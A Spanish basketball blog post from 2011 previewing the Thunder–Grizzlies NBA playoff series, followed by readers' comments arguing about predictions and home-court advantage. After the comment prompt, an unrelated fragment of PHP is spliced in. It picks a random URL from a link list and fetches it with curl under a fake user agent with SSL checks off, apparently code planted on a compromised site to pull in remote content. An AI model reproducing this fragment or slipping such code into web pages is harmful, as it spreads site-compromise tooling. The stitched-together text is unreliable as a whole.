Análisis Oklahoma City Thunder vs Memphis Grizzlies

01 de May de 2011 por Viva_Dirk

Regular: 1-2 Memphis

Thunder: 104.8 PF – 101 PC
Grizzlies:
99.9 PF – 97.6

Estamos posiblemente ante la eliminatoria más atractiva de ver de todas las semifinales. Ambos equipos se sienten muy cómodos en el juego de transición, algo que suelen conseguir con una defensa exterior feroz, y en estático sus armas no son pocas. Si unos cuentan con un Kevin Durant que viene de endosar 32 puntos por noche a los Nuggets, los otros han visto a Zach Randolph masacrar a los Spurs, ambos con ayudas de gran calidad. Puede dar la sensación de que ambos son equipos jóvenes, con potencial pero inexpertos, pero sólo es cierto en el caso de Oklahoma que ve como llega hasta aquí con sus máximas estrellas con 23 años y un gran recorrido por delante. En cambio, Memphis cuenta con un grupo mas experto, rodado y con menos oportunidades por aprovechar.

Es una serie que va a enfrentar el poder del grupo, que lleva como bandera Memphis Grizzlies, contra el talento individual que respiran los poros de Kevin Durant y en menor medida de Russell Westbrook, a los que acompañan un grupo muy físico. Ambas formulas han triunfado con anterioridad. Esta batalla será apasionante.

Claves de la eliminatoria:

– Estrellas en problemas: Kevin Durant y Zach Randolph van a tener que sudar cada canasta. Durant va a tener en frente una defensa exterior que en sus días buenos a amargado a Parker&Ginobili. Van a llegar a cada ayuda, puntear cada tiro y por si fuera poco con el excelente funcionamiento global, Tony Allen y Shane Battier pueden hacérselo pasar mal por sí mismos. Por su parte, Zach se va a encontrar con la pareja interior más física de la liga. Ibaka viene de colocar casi 5 tapones por noche a Denver y sus capacidades físicas rozan el infinito mientras que Perkins es más discreto en sus números pero es un jugador tácticamente perfecto que puede defender a Randolph en el poste bajo sin mayores problemas. Tanto Westbrook como Marc Gasol como segundas referencias tampoco van a disfrutar de una serie plácida.

– Acierto exterior: Es un aspecto más importante para Oklahoma que al carecer de una referencia anotadora interior necesita que su acierto en el tiro de 3 sea alto para facilitar a Durant&Westbrook la anotación. Un escenario en el que Harden, Sefolosha o Cook no sean capaces de anotar sus tiros puede convertise en un infierno para los Thunder. Memphis, aunque generalmente depende menos de este aspecto,  puede llegar a necesitarlo ante el potencial físico de los Thunder que puede pasar factura tanto a Randolph como a Marc.

– Aportación global: Durant y Westbrook han anotado 56 de los 102 puntos que ha promediado Oklahoma frente Denve. Sólo Harden e Ibaka han llagado a los 10 puntos por noche lo que nos vislumbra un sistema ofensivo claramente dirigido a sus estrellas y un grupo compacto y físico en defensa. Para Memphis, Randolph y Gasol han sido una constante,pero todos los demás han tenido su momento, algo que provoca una implicación total y mayor dificultad a la hora de defender. Aquí debemos incluir el rendimiento de la ‘segunda unidad’ que practicamente no existe en Oklahoma ya que Durant disputa 42 minutos por noche y la aportación del banco se reduce a lo que ofrezca James Harden.

Pronóstico: 4-2 Memphis

Comenta

16 comentarios a esta entrada

  1. Javijaen dice:
    #1

    Esta es junto a Celtics-Heat la eliminatoria que intentaré seguir, porque me parece bastante igualada. De todas formas, apuesto por un 4-2 pero para Oklahoma. Creo que la pareja Weestbrook-Durant es mejor que la de Zach-Marc (obviando puestos claro), y aunque Memphis pueda ser más completo, no veo a los Thunder muy por debajo. Además, puede que a los Grizzlies le pese esta segunda ronda. Ya veremos…

      Citar

  2. TheDeerHunter dice:
    #2

    A mí los Thunder me parecen un equipo sin apenas fisuras. Creo que pasarán a la final de conferencia merecidamente.

      Citar

  3. Antoine Doinel dice:
    #3

    Como os arriesgáis en los pronósticos, no?

      Citar

  4. Len Bias dice:
    #4

    Thunder 4-1 Memphis
    Creo que, o espabilan mucho los Lakers, o a Oklahoma no lo para nadie en el Oeste, vaya equipazo

    Gay no juega en toda la temporada no?

      Citar

  5. Viva_Dirk dice:
    #5

    No, Gay no juega. A mi Oklahoma me parece un buen equipo pero a los Grizzlies les he visto impresionantes contra San Antonio, y los Thunders han ganado varios partidos apurados, gracias casi exclusivamente a Durant que se va a encontrar una defensa mucho mas fuerte en esta serie.

      Citar

  6. Denise dice:
    #6

    El acierto exterior de los Thunder comparado con el pobre de los Grizzlies, y el hecho de tener a dos torres como Ibaka y Perkins que taponen o intimiden los continuos cortes y entradas a canasta de los exteriores de los Ositos será lo que desnivele la balanza a favor de los Thunder.

      Citar

  7. Nacho dice:
    #7

    A 1 13 del final 12 arriba los grizzlies. No es por nada Viva, pero creo que tu pronóstico va por buen camino. Estos chicos no tienen nada que perder, y a ver quien los para. 32-10 Zach y 20-12 Marc. Con Perkins e Ibaka enfrente. Vamos, que de monumento. Los ositos y el pronóstico, digo.

      Citar

  8. Nacho dice:
    #8

    Definitivo, la primera en la frente, Grizzlies toman ventaja de campo.

      Citar

  9. Denise dice:
    #9

    Pues si, Grizzlies ganan el primero, aunque sigo confiando en los Thunder como finalistas del Oeste. Lo de que ahora los Grizzlies se hacen con el factor cancha, en mi opinión no vale de nada. Lo de que el factor cancha da ventaja es una de las mayores mentiras del baloncesto.

      Citar

  10. Viva_Dirk dice:
    #10

    Como Memphis se centre en que no anote nadie mas que Durant y Westbrook la cosa se pone muy fea para el actual sistema de juego de Oklahoma, Scott Brooks se tiene que dar cuenta de que Harden tiene que jugar un papel fundamental.

      Citar

  11. TheDeerHunter dice:
    #11

    En un mundo paralelo/imaginario posiblemente tengas razón, Denise.
    En esta realidad lo del factor cancha es estadística y numéricamente demostrable. Lo puedes consultar tú mismo cuando te apetezca.

      Citar

  12. Denise dice:
    #12

    Estadisticamente gana mayoritariamente el que empieza con factor cancha, pero no por ello, sino porque es el mejor de los dos equipos. Pero si te pones a analizar series, no solo de este año, sino de cualquiera, observarás que el equipo que gana una serie, casi siempre gana algun partido fuera, como minimo y el que pierde a veces gana fuera. Es decir, que casi nunca vemos una serie a 7 partidos decidida 4-3 con cada uno de los equipos ganando en su campo, que se supone que es esa la ventaja, jugar en tu cancha. Para mi, una falacia.
    PD: Miami gana a Boston, ya lo comentaremos mañana.

      Citar

  13. TheDeerHunter dice:
    #13

    Para nada. Estadísticamente gana quien juega en casa. Y con mucha diferencia.

      Citar

  14. Denise dice:
    #14

    Pero si tan importante es jugar en casa y tanta ventaja te aporta en una serie….¿por qué hay tan pocas eliminatorias decididas por 4-3 con cada equipo ganando sus partidos en casa?…en mi opinion, jugar en casa solo beneficia más en caso de un septimo partido, en el resto no.

      Citar

  15. Txusma dice:
    #15

    Si siguiéramos tu lógica punto por punto todas las eliminatorias se resolverían por 4-0, ganando el mejor equipo, no?

      Citar

  16. TheDeerHunter dice:
    #16

    Te respondo, Denise… la ventaja existe, pero tampoco es tanta como para hacer de un equipo inferior uno superior inexorablemente.
    Por lo general, y en esta primera ronda (y en casi todas) se ha puesto de manifiesto, suele llevarse el gato al agua quien logra robar algún partido en casa del rival.
    La proporción de victorias locales sobre foráneas es este año, de momento, de 3 a 1. No está mal, para ser según tú una de las grandes mentiras del baloncesto.

    En realidad es lo contrario. Uno de los grandes axiomas del baloncesto, porque año tras año se repite… y diría que de casi cualquier otro deporte.
    Sería una buena pregunta trivial para Sergio en cuantas ocasiones en toda la historia han habido más victorias foráneas de caseras. No habrán sido muchas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>